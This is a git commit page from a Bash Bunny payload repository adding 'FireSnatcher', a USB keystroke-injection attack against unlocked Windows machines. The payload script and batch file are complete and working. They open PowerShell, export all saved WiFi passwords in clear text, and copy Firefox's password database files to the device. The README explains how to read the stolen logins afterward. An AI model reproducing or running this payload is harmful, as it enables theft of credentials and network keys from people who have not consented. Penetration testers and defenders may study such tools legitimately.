hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add files via upload (#518)

Browse Source 
New Payload. FireSnatcher
This commit is contained in:
KarrotKak3 2022-04-29 19:05:40 -04:00 committed by GitHub
parent 3f41494153
commit f12c486e12
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 129 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
payloads/library/credentials/FireSnatcher/FireSnatcher.bat Normal file
View File

@ -0,0 +1,6 @@
mkdir %~dp0\loot\%COMPUTERNAME%
cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear
C: cd \D %appdata%\mozilla\firefox\profiles\
cd %appdata%\mozilla\firefox\profiles\*.default-release\
copy key4.db %~dp0\loot\%COMPUTERNAME%
copy logins.json %~dp0\loot\%COMPUTERNAME%

45
payloads/library/credentials/FireSnatcher/README.md Normal file
View File

@ -0,0 +1,45 @@
# Title: FireSnatcher
# Description: Copies Wifi Keys, and Firefox Password Databases
# Author: KarrotKak3
# Props: saintcrossbow & 0iphor13
# Version: 1.0.2.0 (Work in Progress)
# Category: Credentials
# Target: Windows (Logged in)
# Attackmodes: HID, Storage
# Full Description
# ----------------
# Attacks an Unlocked Windows Machine
# Payload targets:
# - All WiFi creds
# - Firefox Saved Password Database
#
# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
# Delays to Allow Powershell Time to Open and to Give Attack time to Run
# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins
# KNOWN ISSUES
# ---------------
# Loot is saved in Payloads/switch#/loot
# Files
# -----
# - payload.txt: Starts the attack. All configuration contained in this file.
# - FireSnatcher.bat: Worker that grabs Creds
# Setup
# -----
# - Place the payload.txt and FireSnatcher.bat in Payload folder
# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility
**LED meanings**
- Magenta: Initial setup about 1 3 seconds
- Single yellow blink: Attack in progress
- Green rapid flash, then solid, then off: Attack complete

78
payloads/library/credentials/FireSnatcher/payload.txt Normal file
View File

@ -0,0 +1,78 @@
# Title: FireSnatcher
# Description: Copies Wifi Keys, and Firefox Password Databases
# Author: KarrotKak3
# Props: saintcrossbow & 0iphor13
# Version: 1.0.2.0 (Work in Progress)
# Category: Credentials
# Target: Windows (Logged in)
# Attackmodes: HID, Storage
# Full Description
# ----------------
# Attacks an Unlocked Windows Machine
# Payload targets:
# - All WiFi creds
# - Firefox Saved Password Database
#
# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
# Delays to Allow Powershell Time to Open and to Give Attack time to Run
# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins
# KNOWN ISSUES
# ---------------
# Loot is saved in Payloads/switch#/loot
# Files
# -----
# - payload.txt: Starts the attack. All configuration contained in this file.
# - FireSnatcher.bat: Worker that grabs Creds
# Setup
# -----
# - Place the payload.txt and FireSnatcher.bat in Payload folder
# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility
# LEDs
# ----
# Magenta: Initial setup about 1 3 seconds
# Single yellow blink: Attack in progress
# Green rapid flash, then solid, then off: Attack complete Bash Bunny may be removed
# Options
# -------
# Name of Bash Bunny volume that appears to Windows (BashBunny is default)
BB_NAME="BashBunny"
# Setup
# -----
LED SETUP
# Attack
# ------
ATTACKMODE HID STORAGE
Q DELAY 500
LED ATTACK
Q DELAY 100
Q GUI r
Q DELAY 100
Q STRING powershell Start-Process powershell
Q ENTER
Q DELAY 7000
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')"
Q ENTER
Q DELAY 8000
Q STRING EXIT
Q ENTER
sync
LED FINISH
Q DELAY 1500
shutdown now